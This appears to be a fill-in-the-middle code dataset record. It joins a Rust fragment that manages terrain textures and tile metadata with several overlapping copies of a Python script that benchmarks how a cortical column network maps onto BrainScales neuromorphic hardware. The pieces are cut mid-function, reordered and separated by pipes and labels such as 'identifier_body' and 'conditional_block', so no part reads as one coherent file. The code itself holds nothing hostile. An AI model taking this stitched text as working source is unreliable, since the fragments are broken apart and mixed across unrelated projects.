buffer.unmap();
encoder.copy_buffer_to_texture(
wgpu::BufferCopyView {
buffer: &buffer,
layout: wgpu::TextureDataLayout {
offset: 0,
bytes_per_row: row_pitch as u32,
rows_per_image: height as u32 / desc.depth,
},
},
wgpu::TextureCopyView {
texture: &texture,
mip_level: 0,
origin: wgpu::Origin3d { x: 0, y: 0, z: 0 },
},
wgpu::Extent3d {
width: width as u32,
height: height as u32 / desc.depth,
depth: desc.depth,
},
);
Ok(texture)
}
pub(crate) fn write_texture(
&self,
name: &str,
desc: TextureDescriptor,
data: &[u8],
) -> Result<(), Error> {
self.update_texture(name, desc)?;
if desc.format == TextureFormat::RGBA8 {
let filename = TERRA_DIRECTORY.join(format!("{}.bmp", name));
Ok(image::save_buffer_with_format(
&filename,
data,
desc.width,
desc.height * desc.depth,
image::ColorType::Rgba8,
image::ImageFormat::Bmp,
)?)
} else {
let filename = TERRA_DIRECTORY.join(format!("{}.raw", name));
Ok(fs::write(&filename, data)?)
}
}
pub(crate) fn reload_texture(&self, name: &str) -> bool {
let desc = self.lookup_texture(name);
if let Ok(Some(desc)) = desc {
if desc.format == TextureFormat::RGBA8 {
TERRA_DIRECTORY.join(format!("{}.bmp", name)).exists()
} else {
TERRA_DIRECTORY.join(format!("{}.raw", name)).exists()
}
} else {
false
}
}
pub(crate) fn layers(&self) -> &VecMap<LayerParams> {
&self.layers
}
pub(crate) fn tile_name(layer: LayerType, node: VNode) -> PathBuf {
let face = match node.face() {
0 => "0E",
1 => "180E",
2 => "90E",
3 => "90W",
4 => "N",
5 => "S",
_ => unreachable!(),
};
let (layer, ext) = match layer {
LayerType::Displacements => ("displacements", "raw"),
LayerType::Albedo => ("albedo", "bmp"),
LayerType::Roughness => ("roughness", "raw"),
LayerType::Normals => ("normals", "raw"),
LayerType::Heightmaps => ("heightmaps", "raw.sz"),
};
TERRA_DIRECTORY.join(&format!(
"tiles/{}_{}_{}_{}x{}.{}",
layer,
node.level(),
face,
node.x(),
node.y(),
ext
))
}
pub(crate) fn reload_tile_state(
&self,
layer: LayerType,
node: VNode,
base: bool,
) -> Result<TileState, Error> {
let filename = Self::tile_name(layer, node);
let meta = self.lookup_tile_meta(layer, node);
let exists = filename.exists();
let target_state = if base && exists {
TileState::Base
} else if base {
TileState::MissingBase
} else if exists {
TileState::Generated
} else {
TileState::Missing
};
if let Ok(Some(TileMeta { state, .. })) = meta {
if state == target_state {
return Ok(state);
}
}
let new_meta = TileMeta { state: target_state, crc32: 0 };
self.update_tile_meta(layer, node, new_meta)?;
Ok(target_state)
}
// pub(crate) fn set_missing(
// &self,
// layer: LayerType,
// node: VNode,
// base: bool,
// ) -> Result<(), Error> {
// let state = if base { TileState::MissingBase } else { TileState::Missing };
// self.update_tile_meta(layer, node, TileMeta { crc32: 0, state })
// }
pub(crate) fn clear_generated(&mut self, layer: LayerType) -> Result<(), Error> {
self.scan_tile_meta(layer, |node, meta| {
if let TileState::Generated = meta.state {
self.remove_tile_meta(layer, node)?;
}
Ok(())
})
}
pub(crate) fn get_missing_base(&self, layer: LayerType) -> Result<Vec<VNode>, Error> {
let mut missing = Vec::new();
self.scan_tile_meta(layer, |node, meta| {
if let TileState::MissingBase = meta.state {
missing.push(node);
}
Ok(())
})?;
Ok(missing)
}
//
// These functions use the database.
//
fn lookup_tile_meta(&self, layer: LayerType, node: VNode) -> Result<Option<TileMeta>, Error> {
let key = bincode::serialize(&(layer, node)).unwrap();
Ok(self.tiles.get(key)?.map(|value| bincode::deserialize(&value).unwrap()))
}
fn update_tile_meta(&self, layer: LayerType, node: VNode, meta: TileMeta) -> Result<(), Error> {
let key = bincode::serialize(&(layer, node)).unwrap();
let value = bincode::serialize(&meta).unwrap();
self.tiles.insert(key, value)?;
Ok(())
}
fn remove_tile_meta(&self, layer: LayerType, node: VNode) -> Result<(), Error> {
let key = bincode::serialize(&(layer, node)).unwrap();
self.tiles.remove(key)?;
Ok(())
}
fn scan_tile_meta<F: FnMut(VNode, TileMeta) -> Result<(), Error>>(
&self,
layer: LayerType, | for i in self.tiles.scan_prefix(&prefix) {
let (k, v) = i?;
let meta = bincode::deserialize::<TileMeta>(&v)?;
let node = bincode::deserialize::<(LayerType, VNode)>(&k)?.1;
f(node, meta)?;
}
Ok(())
}
fn lookup_texture(&self, name: &str) -> Result<Option<TextureDescriptor>, Error> {
Ok(self.textures.get(name)?.map(|value| serde_json::from_slice(&value).unwrap()))
}
fn update_texture(&self, name: &str, desc: TextureDescriptor) -> Result<(), Error> {
let value = serde_json::to_vec(&desc).unwrap();
self.textures.insert(name, value)?;
Ok(())
}
} | mut f: F,
) -> Result<(), Error> {
let prefix = bincode::serialize(&layer).unwrap(); | random_line_split |
run.py | #!/usr/bin/env python
import argparse
from datetime import datetime
import json
import numpy as np
import pyhmf as pynn
import pyhalco_hicann_v2 as C
from pymarocco import PyMarocco
from pymarocco import Defects
from pysthal.command_line_util import init_logger
init_logger("ERROR", [])
import params as par
import pylogging
logger = pylogging.get("column-benchmark")
# At the moment only the deflaut placement strategy is tested. Can be added later to test different strategy
from pymarocco_runtime import ClusterByPopulationConnectivity as placer_pop
from pymarocco_runtime import ClusterByNeuronConnectivity as placer_neuron_cluster
from pymarocco_runtime import byNeuronBlockEnumAndPopulationIDasc as placer_enum_IDasc
class CorticalNetwork(object):
def __init__(self, marocco, scale, k_scale, seed):
# total connection counter
self.totalConnections = 0
self.marocco = marocco
# scale compared to original in amount of neurons network which has about 80,000 neurons
self.scale = scale
# scale connections, scales number of connections
self.k_scale = k_scale
# Name Tag
self.model = pynn.IF_cond_exp
self.seed = seed
pynn.setup(marocco=self.marocco)
def get_indegrees(self):
'''Get number of incoming synapses per neuron (used for in-degree scaling)'''
K = np.zeros([len(par.label),len(par.label)])
num_neurons = self.get_neuron_number()
for target_index, target_pop in enumerate(par.label):
for source_index, source_pop in enumerate(par.label):
n_target = num_neurons[target_index]
n_source = num_neurons[source_index]
K[target_index][source_index] = np.log(1. -
par.conn_probs[target_index][source_index]) / np.log(
1. - 1. / (n_target * n_source))/n_target
return K
def get_neuron_number(self):
'''stores the neuron numbers in list ordered such as label'''
num_neurons = []
layers = ['L23','L4','L5','L6']
keys = ['E', 'I']
for layer in layers:
for key in keys:
num_neurons.append(par.num_neurons[layer][key])
return num_neurons
def build(self):
# set populations
self.populations = {}
# calculate indegrees from connection probability
self.indegrees = self.get_indegrees()
for layer, exIn in par.num_neurons.items():
# [:1] to remove the first "L"
self.populations[layer[1:] + "e"] = pynn.Population(
int(exIn["E"] * self.scale), self.model)
self.populations[layer[1:] + "i"] = pynn.Population(
int(exIn["I"] * self.scale), self.model)
# Create projections
self.projections = []
self.projectionLabels = []
for targetIndex, targetPop in enumerate(par.label):
for sourceIndex, sourcePop in enumerate(par.label):
if sourcePop.endswith("e"):
target = "excitatory"
else:
target = "inhibitory"
sourceSize = self.populations[sourcePop].size
targetSize = self.populations[targetPop].size
# In-degree scaling as described in Albada et al. (2015) "Scalability of Asynchronous Networks
# Is Limited by One-to-One Mapping between Effective Connectivity and Correlations"
# Number of inputs per target neuron (in-degree) for full scale model is scaled with k_scale
# To receive total connection number it is multiplied with downscaled target population size (scale)
# Connection probability is not preserved if scale == k_scale (multiple connections neglected)
n_connection = int(round(self.indegrees[targetIndex][sourceIndex] * self.k_scale * targetSize))
self.totalConnections += n_connection
if(n_connection == 0):
continue
# connection matrix [(neuron_pop1,neuron_pop2,weight,delay),(...)]
matrix = np.zeros((4, n_connection),dtype= float)
np.random.seed(self.seed)
matrix[0] = np.random.randint(0, sourceSize, n_connection)
matrix[1] = np.random.randint(0, targetSize, n_connection)
# The delay and weight is not important for mapping
# PyNN requires it to be set to some value
matrix[2] = np.repeat(1, n_connection) # arbitrary weight
matrix[3] = np.repeat(0, n_connection) # arbitrary delay
matrix = matrix.T
matrix = [[int(a),int(b),c,d] for a,b,c,d in matrix]
connector = pynn.FromListConnector(matrix)
self.projections.append(pynn.Projection(
self.populations[sourcePop], self.populations[targetPop], connector, target=target, label=sourcePop + "-" + targetPop))
self.projectionLabels.append(sourcePop + "-" + targetPop)
print("total connections:", self.totalConnections)
# external input:
self.externalInputPops = {}
# External spikes or external current
external_source = par.external_source
# will not work for large networks, for now it is not used due to par.external_source
if (external_source == "spikeInput"):
print("using external input connections")
for layer, amount in par.K_ext.items():
# rate is given in model with 8Hz
# will not work for large networks, for now it is not used due to par.external_source
rate_to_ex = par.bg_rate * amount["E"] * self.k_scale
rate_to_in = par.bg_rate * amount["I"] * self.k_scale
self.externalInputPops[layer[1:] + "e"] = pynn.Population(
self.populations[layer[1:] + "e"].size, pynn.SpikeSourcePoisson, {'rate': rate_to_ex})
self.externalInputPops[layer[1:] + "i"] = pynn.Population(
self.populations[layer[1:] + "i"].size, pynn.SpikeSourcePoisson, {'rate': rate_to_in})
# create connections
for sourceKey, sourcePop in self.externalInputPops.items():
# set connector for each pop size since RandomDistribution object not supported by pyhmf
# arbitrary weight
externalConnector = pynn.OneToOneConnector(
weights = 1)
# create connection
self.projections.append(pynn.Projection(
sourcePop, self.populations[sourceKey], externalConnector, target="excitatory"))
self.projectionLabels.append("ext.-" + targetPop)
def getLoss(self, marocco):
perPopulation = {}
for i in range(len(self.projections)):
synLoss, totalSyn = self.projectionwise_synapse_loss(
self.projections[i], marocco)
perPopulation[self.projectionLabels[i]] = {
"synLoss": synLoss, "TotalSyns": totalSyn}
return perPopulation
def run(self):
|
def projectionwise_synapse_loss(self, proj, marocco):
"""
computes the synapse loss of a projection
params:
proj - a pyhmf.Projection
marocco - the PyMarocco object after the mapping has run.
returns: (nr of lost synapses, total synapses in projection)
"""
orig_weights = proj.getWeights(format='array')
mapped_weights = marocco.stats.getWeights(proj)
syns = np.where(~np.isnan(orig_weights))
realized_syns = np.where(~np.isnan(mapped_weights))
orig = len(syns[0])
realized = len(realized_syns[0])
if orig > 0:
print ("Projection-Wise Synapse Loss", proj, (orig - realized) * 100. / orig)
return orig - realized, orig
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def main():
parser = argparse.ArgumentParser()
# scale factor of the whole network compared to the original one
parser.add_argument('--scale', default=0.01, type=float)
# size of one neueron in hw neurons
parser.add_argument('--n_size', default=4, type=int)
parser.add_argument('--k_scale', type=float) # scale of connections
# wafer defects that should be considered in the mapping
parser.add_argument('--wafer', '-w', type=int, default=24)
# specific path where the defect parts of the wafer are saved
# if nothing specified, current defects of the given wafer are used
parser.add_argument('--defects_path', type=str)
parser.add_argument('--ignore_blacklisting', type=str2bool, nargs='?',
default = False, const=True)
parser.add_argument('--name', type=str,
default='cortical_column_network') # name
parser.add_argument('--placer', type=str, default='byNeuron')
parser.add_argument('--seed', default=0, type=int)
args = parser.parse_args()
# k_scale is set to "scale" by deflaut
if not args.k_scale:
args.k_scale = args.scale
taskname = "scale{}_k-scale{}_nsize{}_wafer{}_ignoreBlacklsiting{}".format(
args.scale,
args.k_scale,
args.n_size,
args.wafer,
args.ignore_blacklisting)
marocco = PyMarocco()
marocco.neuron_placement.default_neuron_size(args.n_size)
if(args.ignore_blacklisting):
marocco.defects.backend = Defects.Backend.Without
else:
marocco.defects.backend = Defects.Backend.XML
marocco.skip_mapping = False
marocco.backend = PyMarocco.Without
marocco.continue_despite_synapse_loss = True
marocco.default_wafer = C.Wafer(args.wafer) # give wafer args
marocco.calib_backend = PyMarocco.CalibBackend.Default
marocco.calib_path = "/wang/data/calibration/brainscales/default"
if args.defects_path:
marocco.defects.path = args.defects_path
else:
marocco.defects.path = "/wang/data/commissioning/BSS-1/rackplace/" + str(
args.wafer) + "/derived_plus_calib_blacklisting/current"
# c 4189 no specification
#taskname += "_c4189_"
# strategy
marocco.merger_routing.strategy( # is now default
marocco.merger_routing.minimize_as_possible)
#taskname += "_minimAsPoss"
'''
# placement strategy
user_strat = placer()
taskname += "_placer"
'''
if args.placer == "byNeuron":
user_strat = placer_neuron_cluster() # cluster by neurons
taskname += "_byNeuron"
marocco.neuron_placement.default_placement_strategy(user_strat)
if args.placer == "byEnum":
user_strat = placer_enum_IDasc() # cluster by neurons
taskname += "_byEnum"
marocco.neuron_placement.default_placement_strategy(user_strat)
if args.placer == "constrained":
# needed for 5720 with patch set 36(best results) or ps 50
from pymarocco_runtime import ConstrainedNeuronClusterer as placer_neuron_resizer
user_strat = placer_neuron_resizer()
taskname += "_constrained"
marocco.neuron_placement.default_placement_strategy(user_strat)
# give marocco the format of the results file
taskname += str(datetime.now())
marocco.persist = "results_{}_{}.xml.gz".format(
args.name, taskname)
start = datetime.now()
r = CorticalNetwork(marocco, scale=args.scale, k_scale=args.k_scale, seed = args.seed)
r.build()
mid = datetime.now()
try:
r.run()
totsynapses = marocco.stats.getSynapses()
totneurons = marocco.stats.getNumNeurons()
lostsynapses = marocco.stats.getSynapseLoss()
lostsynapsesl1 = marocco.stats.getSynapseLossAfterL1Routing()
perPopulation = r.getLoss(marocco)
print("Losses: ", lostsynapses, " of ", totsynapses, " L1Loss:",
lostsynapsesl1, " Relative:", lostsynapses / float(totsynapses))
except RuntimeError as err:
# couldn't place all populations
totsynapses = 1
totneurons = 1
lostsynapses = 1
lostsynapsesl1 = 1
logger.error(err)
end = datetime.now()
print("time:", end - start)
result = {
"model": args.name,
"task": taskname,
"scale": args.scale,
"k_scale": args.k_scale,
"n_size": args.n_size,
"wafer": args.wafer,
"ignore_blacklisting": args.ignore_blacklisting,
"timestamp": datetime.now().isoformat(),
"placer": args.placer,
"perPopulation": perPopulation,
"results": [
{"type": "performance",
"name": "setup_time",
"value": (end - mid).total_seconds(),
"units": "s",
"measure": "time"
},
{"type": "performance",
"name": "total_time",
"value": (end - start).total_seconds(),
"units": "s",
"measure": "time"
},
{"type": "performance",
"name": "synapses",
"value": totsynapses
},
{"type": "performance",
"name": "neurons",
"value": totneurons
},
{"type": "performance",
"name": "synapse_loss",
"value": lostsynapses
},
{"type": "performance",
"name": "synapse_loss_after_l1",
"value": lostsynapsesl1
}
]
}
with open("{}_{}_results.json".format(result["model"], result["task"]),
'w') as outfile:
json.dump(result, outfile)
if __name__ == '__main__':
r = main()
| pynn.run(1)
pynn.end() | identifier_body |
run.py | #!/usr/bin/env python
import argparse
from datetime import datetime
import json
import numpy as np
import pyhmf as pynn
import pyhalco_hicann_v2 as C
from pymarocco import PyMarocco
from pymarocco import Defects
from pysthal.command_line_util import init_logger
init_logger("ERROR", [])
import params as par
import pylogging
logger = pylogging.get("column-benchmark")
# At the moment only the deflaut placement strategy is tested. Can be added later to test different strategy
from pymarocco_runtime import ClusterByPopulationConnectivity as placer_pop
from pymarocco_runtime import ClusterByNeuronConnectivity as placer_neuron_cluster
from pymarocco_runtime import byNeuronBlockEnumAndPopulationIDasc as placer_enum_IDasc
class CorticalNetwork(object):
def __init__(self, marocco, scale, k_scale, seed):
# total connection counter
self.totalConnections = 0
self.marocco = marocco
# scale compared to original in amount of neurons network which has about 80,000 neurons
self.scale = scale
# scale connections, scales number of connections
self.k_scale = k_scale
# Name Tag
self.model = pynn.IF_cond_exp
self.seed = seed
pynn.setup(marocco=self.marocco)
def get_indegrees(self):
'''Get number of incoming synapses per neuron (used for in-degree scaling)'''
K = np.zeros([len(par.label),len(par.label)])
num_neurons = self.get_neuron_number()
for target_index, target_pop in enumerate(par.label):
for source_index, source_pop in enumerate(par.label):
n_target = num_neurons[target_index]
n_source = num_neurons[source_index]
K[target_index][source_index] = np.log(1. -
par.conn_probs[target_index][source_index]) / np.log(
1. - 1. / (n_target * n_source))/n_target
return K
def get_neuron_number(self):
'''stores the neuron numbers in list ordered such as label'''
num_neurons = []
layers = ['L23','L4','L5','L6']
keys = ['E', 'I']
for layer in layers:
for key in keys:
num_neurons.append(par.num_neurons[layer][key])
return num_neurons
def build(self):
# set populations
self.populations = {}
# calculate indegrees from connection probability
self.indegrees = self.get_indegrees()
for layer, exIn in par.num_neurons.items():
# [:1] to remove the first "L"
self.populations[layer[1:] + "e"] = pynn.Population(
int(exIn["E"] * self.scale), self.model)
self.populations[layer[1:] + "i"] = pynn.Population(
int(exIn["I"] * self.scale), self.model)
# Create projections
self.projections = []
self.projectionLabels = []
for targetIndex, targetPop in enumerate(par.label):
for sourceIndex, sourcePop in enumerate(par.label):
if sourcePop.endswith("e"):
target = "excitatory"
else:
|
sourceSize = self.populations[sourcePop].size
targetSize = self.populations[targetPop].size
# In-degree scaling as described in Albada et al. (2015) "Scalability of Asynchronous Networks
# Is Limited by One-to-One Mapping between Effective Connectivity and Correlations"
# Number of inputs per target neuron (in-degree) for full scale model is scaled with k_scale
# To receive total connection number it is multiplied with downscaled target population size (scale)
# Connection probability is not preserved if scale == k_scale (multiple connections neglected)
n_connection = int(round(self.indegrees[targetIndex][sourceIndex] * self.k_scale * targetSize))
self.totalConnections += n_connection
if(n_connection == 0):
continue
# connection matrix [(neuron_pop1,neuron_pop2,weight,delay),(...)]
matrix = np.zeros((4, n_connection),dtype= float)
np.random.seed(self.seed)
matrix[0] = np.random.randint(0, sourceSize, n_connection)
matrix[1] = np.random.randint(0, targetSize, n_connection)
# The delay and weight is not important for mapping
# PyNN requires it to be set to some value
matrix[2] = np.repeat(1, n_connection) # arbitrary weight
matrix[3] = np.repeat(0, n_connection) # arbitrary delay
matrix = matrix.T
matrix = [[int(a),int(b),c,d] for a,b,c,d in matrix]
connector = pynn.FromListConnector(matrix)
self.projections.append(pynn.Projection(
self.populations[sourcePop], self.populations[targetPop], connector, target=target, label=sourcePop + "-" + targetPop))
self.projectionLabels.append(sourcePop + "-" + targetPop)
print("total connections:", self.totalConnections)
# external input:
self.externalInputPops = {}
# External spikes or external current
external_source = par.external_source
# will not work for large networks, for now it is not used due to par.external_source
if (external_source == "spikeInput"):
print("using external input connections")
for layer, amount in par.K_ext.items():
# rate is given in model with 8Hz
# will not work for large networks, for now it is not used due to par.external_source
rate_to_ex = par.bg_rate * amount["E"] * self.k_scale
rate_to_in = par.bg_rate * amount["I"] * self.k_scale
self.externalInputPops[layer[1:] + "e"] = pynn.Population(
self.populations[layer[1:] + "e"].size, pynn.SpikeSourcePoisson, {'rate': rate_to_ex})
self.externalInputPops[layer[1:] + "i"] = pynn.Population(
self.populations[layer[1:] + "i"].size, pynn.SpikeSourcePoisson, {'rate': rate_to_in})
# create connections
for sourceKey, sourcePop in self.externalInputPops.items():
# set connector for each pop size since RandomDistribution object not supported by pyhmf
# arbitrary weight
externalConnector = pynn.OneToOneConnector(
weights = 1)
# create connection
self.projections.append(pynn.Projection(
sourcePop, self.populations[sourceKey], externalConnector, target="excitatory"))
self.projectionLabels.append("ext.-" + targetPop)
def getLoss(self, marocco):
perPopulation = {}
for i in range(len(self.projections)):
synLoss, totalSyn = self.projectionwise_synapse_loss(
self.projections[i], marocco)
perPopulation[self.projectionLabels[i]] = {
"synLoss": synLoss, "TotalSyns": totalSyn}
return perPopulation
def run(self):
pynn.run(1)
pynn.end()
def projectionwise_synapse_loss(self, proj, marocco):
"""
computes the synapse loss of a projection
params:
proj - a pyhmf.Projection
marocco - the PyMarocco object after the mapping has run.
returns: (nr of lost synapses, total synapses in projection)
"""
orig_weights = proj.getWeights(format='array')
mapped_weights = marocco.stats.getWeights(proj)
syns = np.where(~np.isnan(orig_weights))
realized_syns = np.where(~np.isnan(mapped_weights))
orig = len(syns[0])
realized = len(realized_syns[0])
if orig > 0:
print ("Projection-Wise Synapse Loss", proj, (orig - realized) * 100. / orig)
return orig - realized, orig
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def main():
parser = argparse.ArgumentParser()
# scale factor of the whole network compared to the original one
parser.add_argument('--scale', default=0.01, type=float)
# size of one neueron in hw neurons
parser.add_argument('--n_size', default=4, type=int)
parser.add_argument('--k_scale', type=float) # scale of connections
# wafer defects that should be considered in the mapping
parser.add_argument('--wafer', '-w', type=int, default=24)
# specific path where the defect parts of the wafer are saved
# if nothing specified, current defects of the given wafer are used
parser.add_argument('--defects_path', type=str)
parser.add_argument('--ignore_blacklisting', type=str2bool, nargs='?',
default = False, const=True)
parser.add_argument('--name', type=str,
default='cortical_column_network') # name
parser.add_argument('--placer', type=str, default='byNeuron')
parser.add_argument('--seed', default=0, type=int)
args = parser.parse_args()
# k_scale is set to "scale" by deflaut
if not args.k_scale:
args.k_scale = args.scale
taskname = "scale{}_k-scale{}_nsize{}_wafer{}_ignoreBlacklsiting{}".format(
args.scale,
args.k_scale,
args.n_size,
args.wafer,
args.ignore_blacklisting)
marocco = PyMarocco()
marocco.neuron_placement.default_neuron_size(args.n_size)
if(args.ignore_blacklisting):
marocco.defects.backend = Defects.Backend.Without
else:
marocco.defects.backend = Defects.Backend.XML
marocco.skip_mapping = False
marocco.backend = PyMarocco.Without
marocco.continue_despite_synapse_loss = True
marocco.default_wafer = C.Wafer(args.wafer) # give wafer args
marocco.calib_backend = PyMarocco.CalibBackend.Default
marocco.calib_path = "/wang/data/calibration/brainscales/default"
if args.defects_path:
marocco.defects.path = args.defects_path
else:
marocco.defects.path = "/wang/data/commissioning/BSS-1/rackplace/" + str(
args.wafer) + "/derived_plus_calib_blacklisting/current"
# c 4189 no specification
#taskname += "_c4189_"
# strategy
marocco.merger_routing.strategy( # is now default
marocco.merger_routing.minimize_as_possible)
#taskname += "_minimAsPoss"
'''
# placement strategy
user_strat = placer()
taskname += "_placer"
'''
if args.placer == "byNeuron":
user_strat = placer_neuron_cluster() # cluster by neurons
taskname += "_byNeuron"
marocco.neuron_placement.default_placement_strategy(user_strat)
if args.placer == "byEnum":
user_strat = placer_enum_IDasc() # cluster by neurons
taskname += "_byEnum"
marocco.neuron_placement.default_placement_strategy(user_strat)
if args.placer == "constrained":
# needed for 5720 with patch set 36(best results) or ps 50
from pymarocco_runtime import ConstrainedNeuronClusterer as placer_neuron_resizer
user_strat = placer_neuron_resizer()
taskname += "_constrained"
marocco.neuron_placement.default_placement_strategy(user_strat)
# give marocco the format of the results file
taskname += str(datetime.now())
marocco.persist = "results_{}_{}.xml.gz".format(
args.name, taskname)
start = datetime.now()
r = CorticalNetwork(marocco, scale=args.scale, k_scale=args.k_scale, seed = args.seed)
r.build()
mid = datetime.now()
try:
r.run()
totsynapses = marocco.stats.getSynapses()
totneurons = marocco.stats.getNumNeurons()
lostsynapses = marocco.stats.getSynapseLoss()
lostsynapsesl1 = marocco.stats.getSynapseLossAfterL1Routing()
perPopulation = r.getLoss(marocco)
print("Losses: ", lostsynapses, " of ", totsynapses, " L1Loss:",
lostsynapsesl1, " Relative:", lostsynapses / float(totsynapses))
except RuntimeError as err:
# couldn't place all populations
totsynapses = 1
totneurons = 1
lostsynapses = 1
lostsynapsesl1 = 1
logger.error(err)
end = datetime.now()
print("time:", end - start)
result = {
"model": args.name,
"task": taskname,
"scale": args.scale,
"k_scale": args.k_scale,
"n_size": args.n_size,
"wafer": args.wafer,
"ignore_blacklisting": args.ignore_blacklisting,
"timestamp": datetime.now().isoformat(),
"placer": args.placer,
"perPopulation": perPopulation,
"results": [
{"type": "performance",
"name": "setup_time",
"value": (end - mid).total_seconds(),
"units": "s",
"measure": "time"
},
{"type": "performance",
"name": "total_time",
"value": (end - start).total_seconds(),
"units": "s",
"measure": "time"
},
{"type": "performance",
"name": "synapses",
"value": totsynapses
},
{"type": "performance",
"name": "neurons",
"value": totneurons
},
{"type": "performance",
"name": "synapse_loss",
"value": lostsynapses
},
{"type": "performance",
"name": "synapse_loss_after_l1",
"value": lostsynapsesl1
}
]
}
with open("{}_{}_results.json".format(result["model"], result["task"]),
'w') as outfile:
json.dump(result, outfile)
if __name__ == '__main__':
r = main()
| target = "inhibitory" | conditional_block |
run.py | #!/usr/bin/env python
import argparse
from datetime import datetime
import json
import numpy as np
import pyhmf as pynn
import pyhalco_hicann_v2 as C
from pymarocco import PyMarocco
from pymarocco import Defects
from pysthal.command_line_util import init_logger
init_logger("ERROR", [])
import params as par
import pylogging
logger = pylogging.get("column-benchmark")
# At the moment only the deflaut placement strategy is tested. Can be added later to test different strategy
from pymarocco_runtime import ClusterByPopulationConnectivity as placer_pop
from pymarocco_runtime import ClusterByNeuronConnectivity as placer_neuron_cluster
from pymarocco_runtime import byNeuronBlockEnumAndPopulationIDasc as placer_enum_IDasc
class CorticalNetwork(object):
def __init__(self, marocco, scale, k_scale, seed):
# total connection counter
self.totalConnections = 0
self.marocco = marocco
# scale compared to original in amount of neurons network which has about 80,000 neurons
self.scale = scale
# scale connections, scales number of connections
self.k_scale = k_scale
# Name Tag
self.model = pynn.IF_cond_exp
self.seed = seed
pynn.setup(marocco=self.marocco)
def get_indegrees(self):
'''Get number of incoming synapses per neuron (used for in-degree scaling)'''
K = np.zeros([len(par.label),len(par.label)])
num_neurons = self.get_neuron_number()
for target_index, target_pop in enumerate(par.label):
for source_index, source_pop in enumerate(par.label):
n_target = num_neurons[target_index]
n_source = num_neurons[source_index]
K[target_index][source_index] = np.log(1. -
par.conn_probs[target_index][source_index]) / np.log(
1. - 1. / (n_target * n_source))/n_target
return K
def get_neuron_number(self):
'''stores the neuron numbers in list ordered such as label'''
num_neurons = []
layers = ['L23','L4','L5','L6']
keys = ['E', 'I']
for layer in layers:
for key in keys:
num_neurons.append(par.num_neurons[layer][key])
return num_neurons
def build(self):
# set populations
self.populations = {}
# calculate indegrees from connection probability
self.indegrees = self.get_indegrees()
for layer, exIn in par.num_neurons.items():
# [:1] to remove the first "L"
self.populations[layer[1:] + "e"] = pynn.Population(
int(exIn["E"] * self.scale), self.model)
self.populations[layer[1:] + "i"] = pynn.Population(
int(exIn["I"] * self.scale), self.model)
# Create projections
self.projections = []
self.projectionLabels = []
for targetIndex, targetPop in enumerate(par.label):
for sourceIndex, sourcePop in enumerate(par.label):
if sourcePop.endswith("e"):
target = "excitatory"
else:
target = "inhibitory"
sourceSize = self.populations[sourcePop].size
targetSize = self.populations[targetPop].size
# In-degree scaling as described in Albada et al. (2015) "Scalability of Asynchronous Networks
# Is Limited by One-to-One Mapping between Effective Connectivity and Correlations"
# Number of inputs per target neuron (in-degree) for full scale model is scaled with k_scale
# To receive total connection number it is multiplied with downscaled target population size (scale)
# Connection probability is not preserved if scale == k_scale (multiple connections neglected)
n_connection = int(round(self.indegrees[targetIndex][sourceIndex] * self.k_scale * targetSize))
self.totalConnections += n_connection
if(n_connection == 0):
continue
# connection matrix [(neuron_pop1,neuron_pop2,weight,delay),(...)]
matrix = np.zeros((4, n_connection),dtype= float)
np.random.seed(self.seed)
matrix[0] = np.random.randint(0, sourceSize, n_connection)
matrix[1] = np.random.randint(0, targetSize, n_connection)
# The delay and weight is not important for mapping
# PyNN requires it to be set to some value
matrix[2] = np.repeat(1, n_connection) # arbitrary weight
matrix[3] = np.repeat(0, n_connection) # arbitrary delay
matrix = matrix.T
matrix = [[int(a),int(b),c,d] for a,b,c,d in matrix]
connector = pynn.FromListConnector(matrix)
self.projections.append(pynn.Projection(
self.populations[sourcePop], self.populations[targetPop], connector, target=target, label=sourcePop + "-" + targetPop))
self.projectionLabels.append(sourcePop + "-" + targetPop)
print("total connections:", self.totalConnections)
# external input:
self.externalInputPops = {}
# External spikes or external current
external_source = par.external_source
# will not work for large networks, for now it is not used due to par.external_source
if (external_source == "spikeInput"):
print("using external input connections") | self.externalInputPops[layer[1:] + "e"] = pynn.Population(
self.populations[layer[1:] + "e"].size, pynn.SpikeSourcePoisson, {'rate': rate_to_ex})
self.externalInputPops[layer[1:] + "i"] = pynn.Population(
self.populations[layer[1:] + "i"].size, pynn.SpikeSourcePoisson, {'rate': rate_to_in})
# create connections
for sourceKey, sourcePop in self.externalInputPops.items():
# set connector for each pop size since RandomDistribution object not supported by pyhmf
# arbitrary weight
externalConnector = pynn.OneToOneConnector(
weights = 1)
# create connection
self.projections.append(pynn.Projection(
sourcePop, self.populations[sourceKey], externalConnector, target="excitatory"))
self.projectionLabels.append("ext.-" + targetPop)
def getLoss(self, marocco):
perPopulation = {}
for i in range(len(self.projections)):
synLoss, totalSyn = self.projectionwise_synapse_loss(
self.projections[i], marocco)
perPopulation[self.projectionLabels[i]] = {
"synLoss": synLoss, "TotalSyns": totalSyn}
return perPopulation
def run(self):
pynn.run(1)
pynn.end()
def projectionwise_synapse_loss(self, proj, marocco):
"""
computes the synapse loss of a projection
params:
proj - a pyhmf.Projection
marocco - the PyMarocco object after the mapping has run.
returns: (nr of lost synapses, total synapses in projection)
"""
orig_weights = proj.getWeights(format='array')
mapped_weights = marocco.stats.getWeights(proj)
syns = np.where(~np.isnan(orig_weights))
realized_syns = np.where(~np.isnan(mapped_weights))
orig = len(syns[0])
realized = len(realized_syns[0])
if orig > 0:
print ("Projection-Wise Synapse Loss", proj, (orig - realized) * 100. / orig)
return orig - realized, orig
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def main():
parser = argparse.ArgumentParser()
# scale factor of the whole network compared to the original one
parser.add_argument('--scale', default=0.01, type=float)
# size of one neueron in hw neurons
parser.add_argument('--n_size', default=4, type=int)
parser.add_argument('--k_scale', type=float) # scale of connections
# wafer defects that should be considered in the mapping
parser.add_argument('--wafer', '-w', type=int, default=24)
# specific path where the defect parts of the wafer are saved
# if nothing specified, current defects of the given wafer are used
parser.add_argument('--defects_path', type=str)
parser.add_argument('--ignore_blacklisting', type=str2bool, nargs='?',
default = False, const=True)
